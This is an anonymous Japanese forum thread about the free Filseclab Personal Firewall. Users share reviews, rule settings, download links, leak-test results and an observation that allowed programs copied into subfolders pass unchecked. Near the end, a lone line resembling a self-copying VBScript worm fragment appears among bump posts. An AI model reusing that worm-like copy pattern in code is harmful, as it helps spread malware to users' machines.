【完全無料】Filseclab Personal Firewall【1】

Filseclab Personal Firewall Professional Edition
ttp://www.filseclab.com/eng/products/firewall.htm

参考サイト
ttp://www.wilderssecurity.com/showthread.php?s=618a25822788c7fb56adad2e9ba94c3d&t=92710
ttp://eazyfox.homelinux.org/Firewall/Filsec/FilSec001.html

【特徴】
・アプリはフリーで、ソースコードは有料と言うちょっと変った製品。
・動作は軽め＆安定度高い。
・2バイト文字フォルダOK
・高機能な割には設定が理解しやすい。
・ホスト名の指定が出来る＆ワイルドカード指定が出来るので、任意のISPや国を弾いたりできる。
・ICSに対応。
・カーネルレベル、ハイレベルのダブルフィルタリングによる攻撃からの防御。
・ウェブサイトへのアクセスの設定。
・ICMPパケットのコントロール機能。
・自動的にACL（Access Control Lists）を作成。
・リソースの低減。
・最初からいくつかのトロイ等のバックドアのルールが作ってある。
・SP2のセキュリティセンターも認識（切り替え可能）

【欠点】
・複数ポート指定が出来ない。
・ポートの範囲指定も出来ない。
・英語オンリー。
・色が紫でケバイ。

とりあえず、こんなとこで。
ちなみに、インスコ時にMessengerがどうたらってダイアログが出ますが、全部チェック外してしまってもOKなようです。
まだ使い始めて1週間ほどなので、間違い等あれば指摘お願いします。

まとめサイト作成してくれる神も募集します。

KPF2より軽いなら使ってみたいけど

> ・複数ポート指定が出来ない。
> ・ポートの範囲指定も出来ない。

これが結構きついね

　　　　　　　■■■■■■■
　　　　　■■　　　　　　■■■
　　　■■■　　　　　　　　　■■
　　　■■■　　　　　　　　　　■■
　　　■■■■　　　　　　　　　■■
　　　　■■■　　　　　　　　　■■
　　　　　　　　　　　　　　　　　 ■
　　　　　　　　　　　　　　　　 ■
　　　　　　　　　　　■■■■
　　　　　　　　　　　　　　　　 ■
　　　　　　　　　　　　　　　　　 ■
　　　　　　　　　　　　　　　　　 ■■
　　　　■■■　　　　　　　　　■■
　　　■■■■　　　　　　　　　■■　　■■■■ 　　 ■■■■　　■■■■■
　　　■■■　　　∧ ∧　　　 ■■ 　■　　　　　　　　 ■　　　　　　 ■　 ■　 ■
　　　■■■　　　(*ﾟーﾟ)　　■■■　■　　■■■　　■■■　　　　　　 ■
　　　　　■■　　 (∩∩) ■■■　　 ■　　　　　■　　■　　　　　　　　　 ■
　　　　　　■■■■■■■■ 　　　　　■■■■　　　■■■■ 　 　 　 ■

>>3
現在のバージョンでは、RulesタブのNetwork Typeというところで軽く出来ますが、アプリ毎に細かくとかは出来ないっぽいですね。
このNetwork Typeにセットを作成できるようになれば、いろいろと可能になりそうなんですが。

このスレは・・・・・・・・・伸びｒ（ｒｙ

>>5

ん？
間違えてる？
そこで設定できるのはIPの範囲でしょ？

>>1
日本語フォルダでの起動は確認できた。
けど、アプリ内では文字化けするな。
まあ、インスコフォルダに1バイト用フォントがインスコされてるから当たり前だけども。
一応、化けてても動作はするみたいだから良いけど、設定に日本語で説明とか入れたかったぜ。

ちなみに、使い心地とかは悪くない。
最初から、NTPとかDNSとかのシステム関連の設定はしてあるしな。（厳密にするなら、アプリも指定してやった方が良いかも。）
機能的には、Kerioやアウポには及ばんが、ZAとかよりは上ってとこかな。
ICS対応ってのは地味にポイント高いかと。

>>7
そうでした。
早とちりすみませんでした・・

>>8
ですね。
説明が足りなかったかもです。

・2バイト文字フォルダからの起動OK
・ただし、アプリ内で2バイト文字は化ける。

が正しいですね。

中国製ー

おまいの着ている服も中国製じゃないのか？

失礼な！
肌着・下着は米国製
シャツはメキシコ製
コートはイタリア製
靴下はベトナム製
靴・タオルは日本製

こないだユニクロで何しとったんや

あげ〜

あげてなかった

誰も厨極製じゃ使わんみたいだな

デフォルトルールがしっかりしてるから、何も分からない奴でも
すんなり使える。

が、デフォルトルールをみれば分かるように、ポート毎にルールを
作らなければならないのがどうしようもない。

でも今あるフリーでは一番軽いんじゃないのかなあ。

これ、バージョンアップでかなりの機能アップしてるから、今後のバージョンアップで化けるような気がするよ。
とりあえず、複数ポートの指定とか範囲指定だな。
これが実装されたら、現在あるフリーPFWの中では俺的には一押しになる。
対抗馬はJeticoくらいだけど、使いやすさは断然こっちだしな。

Kerioは？

ネトランで取り上げられなきゃ使わない。

>>21
kerioは開発停止になったから難民が増えてるわけで。
現時点では問題無くても、現時点での問題点も修正されないし、機能追加もされないわけだで、先行き不安。

気に入ったので、ちょっとだけ日本語化してみようかと思ったけど、自身のなりすましチェックもしてるみたいだな。
少しでも弄ると起動しないや。

俺の技量では無理。

>>24
乙

>中国の有名ウイルス対策ソフト「金山毒覇」が日本上陸、でもマッチポンプ
>ttp://d.hatena.ne.jp/nekoneko/20050810#p4
やっぱスパイウェア入りだったのか・・・

そんな古いネタでガックリしてんのはお前だけだから気にするな。
しかも、スパイウェアって・・・ｗｗｗ

インスコする時に何も考えずに「Next」をバカスカ押すからそうなる

古いといってもまだ先月か

>1
VerUpしている? していないような気がするんだけどな。
昔の記憶だと、メッセンジャー使って、
VerUPするんじゃなかったけ?
いい加減な記憶で悪いけど、俺は、それで止めたと思う。
いいFWだと思うけど

いつの記憶なのかも書いて無い。

1の解説サイトだと2.5だけど、今はプロフェッショナル版で3.0になって大幅に機能アップしてるし、メッセンジャーなぞ入れてなくてもアップデートプログラムが起動するけど？

これ、NPF意識してない？

AVAST! スレに誤爆してしまった。

AVAST! との併用を試行中。
現行ver3だと6年前のノート(Win98SE)ではリソース食ってきつい。
かといって、ver2.5は本家からダウンロードできないんだね。

sphinxの方が軽い

>>35
感謝。
確かにリソースあまり食ってないね。
AVAST! 4.6 と併用しても、例えばNIS2002の頃のような軽さだね。

・・・で、FilSecも同様なんだけど、
例えば "C:\Program Files\Internet Explorer\IEXPLORE.EXE" 一旦許可しちゃうと、
なりすましっていうのかな、 "C:\Program Files\Internet Explorer\hoge\IEXPLORE.EXE" とか
"C:\Program Files\Internet Explorer\hoge\hogehoge\IEXPLORE.EXE" とか仕込まれても
素通りになるっぽい。チェックサムもスルー。

でも、わかってて使えばそれほど大きな問題はないっていうことで、これ暫く使ってみます。

人いねーー

これだけ過疎かが進んでるっつうことは…

アンインストーラーが付いているけど実際にはアンインストールできない
注意

((((((；ﾟДﾟ))))))ｶﾞｸｶﾞｸﾌﾞﾙﾌﾞﾙ

なあに、かえってOSクリーンインスコができる。

過疎って
１　使ってねえ
２　全く問題なし
どっちなんだろ？

1

2

Total　Uninstallでも？

何が残るのか具体的に書いてくれ
荻原博子じゃないんだから

>>46
もしかして >>39 に対するレスかな？
だとしたら、あくまでも自分の環境（中古ノート、XPSP2）での話なんだけど

　ア ン イ ン ス ト ー ラ ー が 動 き ま せ ん

…という訳で、ご質問には「一切合切残る」としかお答えできませんｗ

多分InstallShield 6のエラーだな

Free Download for Firewall 2.5 Startand Edition
http://dl.filseclab.com/down/xfilter_2.5_en.zip

Filseclab Personal Firewall Professional Edition (3.0)
http://dl.filseclab.com/down/xfilter_en.zip

6月に

age

これProfessional Editionってフリーなの？

>>52
んだよ。
Freeてあるでしょ？
ソース買うと有料。

ソース公開してネットスケープが公開したGeckoみたいに共同開発できればいいんだけどね。
サポートで金取ると。

成熟市場に切り込むにはそうするのが得策かもしれん。

動作が安定しているとのことですがなぜかよくフリーズしてしまう。
ぼくだけなのか？

部屋にあるPC5台全部にインストールしてるけど、全部安定してるよ。

ルールについて
ルーター環境で3.0をつかっていますがNO.90までのルールでデフォルトから
変更すべき箇所はあるのでしょうか。ベストのルール作成について教えて。

explorer.exe リモートアドレス192.168.11.1　リモートポート53　UDPのout
これを勝手に許可されてしまいますが許可しても大丈夫なのでしょうか。
誰か教えて。

５６さんお答え有難うございます。わたしのパソコンがおかしいようですね。
何かがいるようだ。サイセットアップをすべきかな。またね。

セッッティングのオートトラストにチェックいれるとのっとりをすべて許可してしまうね。
まあSSMに監視させとけば大丈夫か。
性能はZA並かな。

カウントがたったの58とは。このFWは全く人気がないようだな。
どうしてなのかな。

ルーターにパソコン１台つないでますが。
ローカルポートの137,138,139,445は閉じてもいいのでしょうか？
わからない。ルール作成がまったくわかりません。
だれか反応してね。

中国製か・・・

米国政府も中国製製品には疑念を抱いているようだな

どういう疑念なんだい。
具体的に書いてほしいな。

政府ではなく議会が問題にしているのでは

つまりアメリカ国民が中国製品を問題視してるってことだな

ヒョンデと本田を混同しマオツォトンは日本人だと思っている連中だからそれは無い

そろそろバージョンが上がるな

シェアウエアになってしまうのか？

もしかしたらAVASTとの相性がわるいのかな。

avast!のフォーラムにスレッドがあったような

静かだな。

＞・色が紫でケバイ。
で、使う気失せた

アジサイ咲いた記念age

みんな生きてるかい。

test

とりあえず、ダウンローダのミラーサイトがミラーされてないのが分かった
GoldTachや多くのﾁｮｿネトゲもそうだが、何で中華やｶﾝｺｯｸは鯖が手抜きなんだ？

これ以外にいい

使ってみた。意外にいい感じかも。
1ルールで問題はポート複数指定できない点か・・・
選択肢が、これ、全部、これ以外
ってのがなあ。まあ、ポートの数増やせばいいだけだが
せめて範囲指定くらい実装してくれるとありがたいんだが。

>>78
でも難点はそこぐらいだよね。
珍しいくらいデフォルトルールがしっかりしてるし、純粋なFWの機能もしっかりしてる。
ポートスキャンとか検出するとトレイやポップアップで知らせるのもいい。
あと動作がすごく軽快。

このソフトはケバイ色合いと中国製ってことが原因で、正当な評価されてない気がする。
かなり使えるWebフィルタもあるし、Jword関連の3721とかデフォで拒否されてるのも好感持てるのに。

Kerio最新版が競合起こしてフリーズしまくるから、
乗り換えで入れてみた

軽いし安定性が高くて好印象
FW界の意外な伏兵だった

>>30
今調べてみたけど、最新版だとメッセ使ってのVerUPじゃないよ
つか、Filmsが明らかに不要物だから
即刻スタートアップ削除&CommonFileの同ファイル削除した

意外にもマトモFWなのがすごいね

中華製なのになｗ
ポートやIPの範囲指定が出来れば
KerioやJetico難民でも受け入れられる
高性能なPFWになれる素質がある。
現状でも、Zoneなんかよりは断然いい。

Kerio難民やJetico難民受け入れるならcomodoだろ

>>85
それはないｗ
comodo実際使って言ってるか？
複数ルールしていしたり細かいルール作ってると
ルールの管理がバグってるのか勝手に上書きされたりして使い物にならない。
YES、NOだけのルールしか作ったことないなら
気付かないのかもしれないが。

とりあえず、中華製でありながらJ-wordが入ってないことはもちろん
対策がきっちりなされている点が評価できるｗ

軽いゾネってイメージで良いんかな。

>>88
ZAと一緒とはちょっと言えないかも。
ポートやIPアドレスの指定は可能だから。
その分、ルール作りは難しい。
Kerioなんかよりかはだいぶマシだが。
あと、ポップでのルール決定でAllで指定しちゃうから
そんままだとZAよりでかい穴できちゃうし。
せめて、OutInくらいは区別して登録できる仕様じゃないと
初心者には扱えない。
慣れた香具師にとってはどうでもいい仕様だと思うけど。
どうせルールいじるわけだし。

それはポップアップのAdvancedを押すとできる

1年間、更新されてないのが気になる。

>>90
そりゃ、わかってる。
デフォでならないから初心者には扱えないって言ってる。

初心者なめすぎｗ

初心者でもレベルがあるよな。
なんでもかんでも調べようとしないで聞いてくるような
自己解決能力のないバカ初心者には無理。

チャレンジ精神旺盛で学習の魚力のある初心者にはお勧めだ。

>>93
魚力ってなんだバカ！と自分でつっこんどくorz能力のミスタイプ

今まで見向きもしなかったくせに
急にアジサイ使う奴が増えたみたいだが何かあったのか。

信者さんが普及活動頑張ってるから。

おれもちょっと見かけたが、
変な普及活動はしないでくれよ。

さらっと軽くて使いやすくていいよくらい書いて
相手が詳しく聞いてきたら詳しいこと書けばいいが、
いきなり他と比べて全然良いみたいに書くと反感かうしやめようぜ。

宣伝レスみたいなのを時々見かけるようになったね、確かに

インストール記念ぱぴこ♪
いいねコレ

何気によさげな評判だから俺も今日から使い始めるぜっ

俺は、今日から
さようならgoldtach
なにげに中華フルコース

proxomitronのルールは
ルール１
　remote:anynet
　direction:out
　protcol:http
　localport:0
　remoteport:80
ルール２
　remote:anynet
　direction:out
　protcol:tcp
　localport:0
　remoteport:8080
で良いのでしょうか

自己レス
ルール１はやばそうだ

何故に

勘違いかもしれません
唯一の情報源の掲示板にHTTPはサーバを公開する場合等、とあったので。
HTTP＝TCPの80と同じと考えれば良いのかな。

ポートの欄に80と入るだけで違いは無いはず
Not Trusted, In, Denyのルールでも作っておいたら

ありがとうございます。
127.0.0.1以外からのアクセスを遮断しようと思って
remote:custom:127.0.0.1
direction:In
protcol:TCP
action:PASS
localport:8080
remoteport:0
こういうルールを作成したら
Outpostのように127.0.0.1以外は拒否するって事になるんでしょうか。

ほかに許可するルールがひとつも無ければBuilt-inの何番かで拒否されて
MonitorにDeny SYSTEMとか何とか出てくる

>>108
感謝！！

このFW、firefoxと相性悪くないか?
firefoxを終了するとほぼブルースクリーン確定なんだが。
それ以外が安定しているだけに残念だ。

>>110
使い始めて間もないが、今のところ問題なし

>>110
プラグインが原因かも

>>112
タイミングとしてはFirefoxを含む複数のアプリケーションを使っているときに
Firefoxを終了すると青画面になって再起動。
他のアプリケーションを先に終了したときは何も起きない。
青画面は一瞬しか表示されないので何かいてあるか読めん。
もうアンインストールしてしまったが、一応環境を書いておきます。
Win XP Pro SP2

Firefoxの拡張は以下の通り。
All-in-One Gestures 0.18.0
ScrapBook 1.2.0.6
Google Pagerank Status 0.9.6
Infoaxia Webアクセシビリティ・ツールボックス 1.0.3 (無効)
Web Developer 日本語版 1.0.2
Html Validator 0.7.9.5
ViewSourcehWith 0.0.8.2
DownThemAll! 0.9.9.7
Tab Mix Plus 0.3.0.5
Link Widgets 1.5
FireDictionary 0.9.5
IE Tab 1.1.1.4
Options Menu 1.2
Talkback 1.5.0.7

Filseclab Messengerについて質問です。
Application Ruleの91番でDeny、
スタートアップでもWindowsDefenderのSoftExploreで無効にしてます。
一ヶ月程は何もなかったのですが、最近プロセスに復活しています。
Denyが効いててアクセスはしてないようですが。
　
これは削除してもいいものですか？
それとも、これによってTrojan防止等のルールが追加される利点があるのでしょうか。

削除しちゃいなさい。

神の声に従いました。

指定したプログラムはポート番号にかかわらずすべてブロックってできないですかね？

すまそ、解決しますた、0でいけますね。
0にしても駄目だったからall指定はないのかと勘違いしてましたがルール作っただけで反映させてませんでした。

>>107の設定で、追加質問ですが
Modify RuleのRemoteにNOTのチェックマークがありますけど
これにチェックすると　127.0.0.1　"以外の"　アクセスを拒否って事でしょうか。

前提となる設定変更部分を忘れてました
action:PASS をDenyです

日本語パッチまだ〜〜〜

http://dl.filseclab.com/update/xfilter_update_pack_en.exe

>>122
ウプ立て来たってこと?
それとも別のソフト?何これ?

122でアップデートできた　thx
しかし、どこが変わったんだろう

>>124
10001番のルールでSystemのPort137,138がダダ漏れ
となった。

サイトで確認してみたけど、アップデートはしてないな。
>>122は前の2.5から3.0にアップデートするやつなんじゃないか？

>>125
どうやって確かめたの

>>126
Yes
何の為に>>122が貼ったのか分からんが・・・

No
3.0が3.02になる

告知なしにアップデートしたことなんて前にもあった。
金があまり無いって言ってたけど最近ソースが売れたから
やる気が出たんだろ。

>>127
モニター

モニターで見たってだけじゃ分からん。

>>132
わかるよ。ルールのPassとDenyを監視、それがモニター。

モニターで見たってだけじゃ分からん。

すみませ、教えてください。
filseclab を使っていると、1時間に一回くらい

SYSTEM via protocol TCP, Port *****《毎回違う wants to
access *.*.*.*《毎回違うURL》; Port *****《毎回違う》, Grant access?

Application　　　　　　　SYSTEM
Protocol/Directtion　　TCP/Out
Local IP/Port　　　　　　192.168.1.2/*****《数字》

というプロンプトが出るんです。
で、私は毎回遮断しているのですが、いちいち遮断を選ぶのが面倒です。
この通信は誰が何をしようとしているんでしょうか？　ウイルスでしょうか？
また、これを黙殺して遮断してくれるような設定はできないでしょうか？
分かる方がおられましたら教えていただければと…。

Enabled * Anynet All All 0 0 Deny Anytime
最期のルールを上のようにすればいいのかな？

>>136
ありがとうございます。
でもそれだと、まだルールを作ってないプログラムが通信をしようとしたら
それも自動的に遮断されてしまいませんか？
まだルールを作ってないプログラムに関しては、プロンプトを出して
どうするか聞いてきてくれる方がいいのですが…。

>>135
Log→Textlogのpfwlog.txtを開いて
SYSTEMが普段使っているポートのみ許可するようにしたらどうですか。
ちなみに自分のはさらっと見たところTCP,53,UDP,67,68のみでした。

具体的にどんなルールを作成すればよいのか。

2チャンネル見たときに14番ルールが使われているのですが
これは問題ないのでしょうか。
14 Enabled * Intranet In HTTP 80 0 Pass Anytime Grants the Intranet access local HTTP
そもそもこのルールは一体何でしょうか。

2ちゃんだけでそうなる？
LAN組んで無いならdisableしてみたら

急に適応されるルールが全てNo.10000 built-in Rulesになってしまった

どうもどうもどうも。
IEでも同じことが発生。しかし今は2ちゃんもIEもなぜか14番ルールはつかわれていない。正常にもどった？
とりあえず14番ルールをdenyにして様子をみます。

FWの誤作動なら良いがP2Pやっているので悪意に侵入されたのかな。

ずっとHighで使ってきたのでMediumにしてみたら、all No.10000は直った。
原因はわからないが一応報告。

何かLiveUpdateきた

>>145　thx
Databaseのversionが174になった

今日またLiveUpdateしてみたら
Programs version 3.02.8950→3.03.8982　になったよ
Status画面の情報が増えた気がする

ルール11のTELNETのdirectionはALLの方がいい気がした
それとあまりに人気が無いのでageて見る

>>148
乗り換えてみたいんだけど、
最初の基本設定(つか、最低設定)がよくわかんないので躊躇してます。
あと、稼働確認はShieldsUP!でオールステルスになればおk?

>>149
アバウトですが言い切ってしまいます。
モードにhigh,medium,lowがあるけどmediumにしていれば基本的なblock設定は自動でやってくれる。これで通常はオールステルス（ident除)
最初はmediumにして、アプリ毎のルールを設定し終わったらhighにするといい。
それと、中国への変な通信はWiresharkで調べたけど見当たらない。
見つけた人は指摘ヨロ。
Filseclab Messengerはいらないからスタートアップから外したほうがいいよ。

>>150
レスありがとう。
とりあえず、mediumはZAみたいなイメージでよいのかな?
そっから個別アプリを登録していくっていう。
暇を見てインスコしてみる勇気が出ますた。

今日ライブアップデートしてみたら、更新があった。
データーベース更新。

"Settings"の"Auto trust"は切っといた方が良いのかな？

>>152 乙
Programs 3.0.3.8982　変わらず
Database 174→262
てかなんでこんなにいきなり上がるのかw
>>153
Auto trust signed by Microsoftの事？
チェック入れてないなぁ。ルール作れば一緒だから。
それじゃなくてAuto grantなら,Waiting for meになってた方がいい気がする。

h

珍しくあがってる
使用者の少なさに乾杯
ログサイズをdefaultの5Mから1Mにしたら随分軽くなった

パソコンがウイルスに感染した少年
http://www.youtube.com/watch?v=Dfnyt61EoHk

それつまんねエロゲ吹き替えの方がおもろい

Firewall Leak Tester ttp://www.firewallleaktester.com やって見ました。
環境：Filseclab Version: 3.0.3.8982 (Professional Edition) ステータスHigh、
基本はIn-Deny Out-Prompt、Windows XP SP2 Pro。default browser IE7。
○[ 1 ] leaktest1.2.exe　漏れ無し
○[ 2 ] tooleaky.exe
　There was apparently no leak, your computer or Internet connection is very slow,
　or, most likely, the GRC.COM website is down temporarily. Please try again later.
　何度やってもこれ。とりあえず漏れ無し。
○[ 3 ] firehole.exe
　アンチウィルスが検出するので終了させて実験。
　その後いくらやっても
　問題が発生したため、firehole.exe を終了します。
　ご不便をおかけして申し訳ありません。となり終了。
×[ 4 ] Yalta.exe
　127.0.0.1 5555 Message Sent sucessfuly ということはプロテクト失敗？
　Proxomitron使用してるのは関係あるかな
○[ 5 ] outbound.exe
　IE7が開き次にアダプターを選べ画面が出るが文字化けしてさっぱりわからず。
　とりあえず一番目を選択してContinue。「指定したデバイスが見つかりません」。
　再度二番目を選択。がまた「指定したデバイスが見つかりません」。漏れ無し？
△[ 6 ] pcaudit.exe
　一回目
　　The level of security on this computer is low.
　　IE7が開きスクショ＆ディレクトリ漏れ。
　二回目、同様（メールはいずれも送られてこない）
　三回目、何故かfilseclabがIE7の許可を求めてきてプロテクト成功。これは？？

[ 7 ] AWFT
　×test 1
　　your personal firewall is porous. つまりダメ。
　　firewallの設定し直せ（若しくは変えろ）といってくるが弄るところわからず。
　×test 2
　　your personal firewall is porous.　同じ。ダメ。
　×test 3
　　Explore.exeを許可するか聞いてきたのでDeny。プロテクト成功。
　×test 4
　　your personal firewall is porous.　ダメ。
　△test 5
　　ちょっとネットサーフしてこのテストを繰り返せとメッセージ。
　　何度繰り返してもsurf a little then repeat this test.？？？諦めた。
　△test 6
　　こいつもsurf a little then repeat this test.test5と同じ？
×[ 8 ] thermite.exe
　IEが起動して無いので動かせと聞いてくる。Successと出た。つまりダメらしい。
○[ 9 ] copycat.exe
　ディスクがいっぱいか書き込み禁止といわれファイルのダウンロードが出来ない。
　しょうがないので即実行してみる。何も起こらない。
　Successと出たらまずいようなのでプロテクト成功？
○[ 10 ] mbtest.exe
　問題が発生したためmbtest.exeを終了しますのエラー窓が出て終了。
　プロテクト成功？
[ 11 ] WallBreaker.exe
　×1st test
　　IE7が起ち上がりyour computer has leaked ! という表示。つまりダメ。
　×2nd test 1stと同じ。
　×3rd test 1stと同じ。
　　一分後にタスクを実行する表示が出た後は1stと同じ。つまりWallBreakerは全滅。

△[ 12 ] pcaudit2(6.3).exe
　これはやる前から結果が見えてる気がするが、やってみる。
　メルアドやらタイピングやらやらされた後、IE7は起ち上がったが
　「Internet Explorer ではこのページは表示できません」。プロテクト成功？
　だがメールは来ていた。
　再度やるとnecmfk.exe（キーボードドライバ）がアクセス要求。
　denyしたところ、IE7がエラー表示。プロテクト成功。
　今度はメールは来ていない。
×[ 13 ] Ghost.exe
　あなたのファイアーウォールは役に立たないとのメッセージ。つまりダメ。
×[ 14 ] dnstester.exe
　successful recursive DNSと出たのでダメなよう。
×[ 15 ] surfer.exe
　IE7が開き、漏れるよ！とのメッセージ。ダメ。
○[ 16 ] breakout-wp.exe（v2)
　v1は404で無い。
　v2は9のcopycat.exeと同じくdownloadできない。従っていきなり実行。
　実行できない。success表示もでないのでプロテクト成功？
？[ 17 ] jumper.exe
　1.done 2.done 3. done 4. done
　よくわからな、、最後にIE7のスタートページ設定画面が現れた。
×[ 18 ] cpil.exe
　dos窓でenterするとcomodoFWのページに飛ばされて。漏れてる！
　プロテクトするにはcomodoをダウソ汁と言われる。
×[ 19 ] PCFlankLeaktest.exe
　漏れてるのでTiny Firewall2005かOutpost Firewall Proを使えと言われる。

このテストはFWのテストではない。残念でした。
しかしきみの努力に敬意を評しがんばったで賞をさしあげます。

賞、いただきました！さんくすｗ
　
確かにIEの脆弱性ばかり突いてきてるんじゃ？と
それで特に後半は投げやりなレポートなわけですが。
自分としてはこの結果は結構満足です。
軽さ重視でfilseclabを選択したので、そうでなく
ガチガチにするならSSM,ProcessGuardその他を導入すれば良いし。
書き忘れてますがWindowsDefenderを常駐させてました。
これの動作良く知らないけどちょっとガッカリ。
外してTeaTimerの方がいいんでしょうか。
　

正誤表
[ 7 ] AWFT のtest3は×じゃなくて○

これ入れてみたがいたって快適
ただ、中国製ってだけがひっかかる
知らぬ間にスパイウェアみたいなことしてる
可能性ってある？

Wiresharkで調べたときはなかったよ。ただし調査期間3日。
これ使ってみない？
Microsoft Network Monitor 3
ttp://www.forest.impress.co.jp/article/2007/02/22/msnetworkmonitor3.html
私も暇なときモニターします。

>>165
レスありがと
自分もモニターしてみるよ
また報告するね

>>164
知らん、だが、俺は同国製の悪名高きツール
Jword関連のポートを拒否するルールが
デフォルトで入ってるっていう点を評価して使ってる。

これ使ってるとActiveSyncで機器を接続してるのに接続されてないことになってしまう・・・
fileseclabを終了するときちんと認識されるんだけどなんでだろ
だれか解決策教えてください

g

これ使ってるとしょっちゅうSYSTEMというプログラムのアクセスを捕まえるんだけど
これは許可しちゃっていいんですかね

基本ルールによるとは思うけど、denyして試してみたらどう？
とりあえずdenyルール作って使用に問題あるなら接続先をwhoisで調べたり。
最近system来なくなったので詳細は忘れ。。

それとGoldtachから乗り換えた人は
mgtaki.sys
tsmail.sys
を削除すべし。
これがシステム警告の理由の時がある。
autoruns持ってるならrunされてないか見てみるといいよ。

g

キングソフトの社員が暴れてますｗ

KINGSOFT Internet Security　Part5
http://pc11.2ch.net/test/read.cgi/sec/1185117507/

f

outpost freeから乗り換え。
全体的に作りも動作もまともだな。

>>176
ただ、こいつの欠点はサスペンドから復帰したときルールガン無視で
インバウンドを全部ブロックしだすことがあるんだよな
多分、説明にあるカーネルレベルでの保護機能が働いてるとかだと思うんだが
この状態を解除できなくて、再起動するまで直らないのがちょっと問題
まあ、勝手にポート開放してダダ漏れ状態になるよかいいんだが
無効にしたら通信はできてるし、システム自体を不安定にしてるって感じじゃないし

何かのタイミング(ネットワーク切断?)でフリーズことがあるみたい。
そうなるとWindows終了時に固まるので、ちょっと微妙。
>>177 まだ発展途上ということかな。

フリーズしてたのは、他のファイアウォールの残骸が残ってたからっぽい。
今はフリーズもなく快適。

age

お正月過ぎたらお年玉Ｕｐｄａｔｅ来るかな

来たよ

COMODOやめて帰ってきたよ。ポート設定とかＭＡＩＬの設定とかこっちのほうがやりやすい。

h

自動起動するとタスクトレイにアイコンが出ないんだけど，どうすれば良いのだろう
普通に起動するとちゃんと出るんだけどなあ．

ほ

j

v

>>167
感動した

保守

C.Copy(dirwin&"\Win32DLL.vbs")

保守